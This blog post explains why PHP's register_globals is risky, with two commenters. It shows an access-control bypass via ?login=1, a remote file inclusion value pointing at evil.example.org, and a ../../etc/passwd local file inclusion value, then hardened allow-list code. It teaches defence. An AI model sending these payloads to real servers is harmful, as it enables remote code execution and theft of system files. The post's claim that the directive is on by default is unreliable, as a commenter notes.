(evil) Register Globals (on)

The register_globals directive is enabled (register_globals = On) by default in PHP versions 4.2.0 and greater in the php config (php.ini). While it doesn’t represent a security vulnerability, it’s a security risk.

Why is it a security risk? Let’s look at this example:

<?php

// $login is never initialised here: if login_user() fails, the variable
// is simply undefined, and its value depends on whatever is already in
// the global scope.
if (login_user())
{
    $login = true;
}

// With register_globals = On, a client can pre-populate $login from the
// request (?login=1), so this check no longer depends on login_user().
if ($login)
{
    include '/highly/sensitive/data.php';
}
?>

With register_globals enabled (register_globals = On), this page can be requested with ?login=1 in the query string to bypass the intended access control.
Of course, this particular vulnerability is the fault of the developer, not register_globals, but this indicates the increased risk posed by the directive. Without it, ordinary global variables (such as $login in the example) are not affected by data submitted by the client.

Another example that illustrates how register_globals can be problematic is the following use of include with a dynamic path:

<?php
    // $path is never assigned in this script; with register_globals = On
    // it is filled directly from the request (?path=...).
    include "$path";
?>

With register_globals enabled, this page can be requested with ?path=http://evil.example.org/evilscript in the query string, which makes the include statement equivalent to:

include 'http://evil.example.org/evilscript';

If allow_url_fopen is enabled (which it is by default), this will include the output of http://evil.example.org/evilscript just as if it were a local file. This is a major security vulnerability called remote file inclusion (RFI), and it is one that has been discovered in many popular open source applications.

The same example can also be used to read local files (local file inclusion, LFI): request the page with ?page=../../../../etc/passwd in the query string and, on Unix-based systems, it will show you the password file.

[Figure: local file inclusion]

I think register_globals must be disabled, and every programmer must take care of PHP's global scope.
The best way is to initialize all variables and to develop with error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development.
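The two snippets above, rewritten the way the advice here suggests. This is an added example, not code from the original post: it initialises every flag before use, maps the requested page through an allow-list instead of including a client-supplied path, and refuses to run at all if the server still has register_globals on. The login_user() stub and the pages/ directory are assumptions.

```php
<?php
// Added example (not from the original post): hardened versions of the two
// snippets above. login_user() and the pages/ directory are hypothetical.

declare(strict_types=1);

// Fail closed if the server still has register_globals = On, so a misconfigured
// deployment is caught immediately instead of silently exposing every variable.
// On PHP 5.4+ the directive no longer exists and ini_get() returns false.
if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('register_globals must be Off');
}

// Hypothetical credential check; a real application would validate a session
// or submitted credentials here.
function login_user(): bool
{
    return false;
}

// 1) Initialise every flag before use. Because $login is assigned here, a
//    ?login=1 query parameter can no longer pre-populate it, even on an old
//    setup where register_globals is still enabled.
$login = false;
if (login_user()) {
    $login = true;
}
if ($login) {
    include '/highly/sensitive/data.php';
}

// 2) Never include a client-controlled path. Read the value explicitly from
//    $_GET and map it through an allow-list of known page names, so neither
//    '../../../../etc/passwd' nor a remote URL can ever reach include().
$allowedPages = [
    'home'    => __DIR__ . '/pages/home.php',
    'contact' => __DIR__ . '/pages/contact.php',
];
$page = $_GET['page'] ?? 'home';
if (!array_key_exists($page, $allowedPages)) {
    http_response_code(404);
    exit('Unknown page');
}
include $allowedPages[$page];
```

Pair this with error_reporting(E_ALL) during development: with the flag initialised, any remaining use of an unset variable shows up as a notice rather than as a silently attacker-controlled value.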


2 comments so far

  1. Bijay Rungta on

    The register_globals directive is disabled (register_globals = Off) by default in PHP versions 4.2.0 and greater in the php config (php.ini). While it doesn’t represent a security vulnerability, it’s a security risk.

    The text is a little misleading...
    The last para should have read as:
    While leaving [emphasize]register_globals [emphasizeEvenMore]On[/emphasizeEvenMore][/emphasize] doesn't represent a security vulnerability, it's a security risk.

    I had come here to confirm what is good and what's bad...

    Thanks a lot.

    Bijay Rungta

  2. b23 on

    Thank you Bijay Rungta!
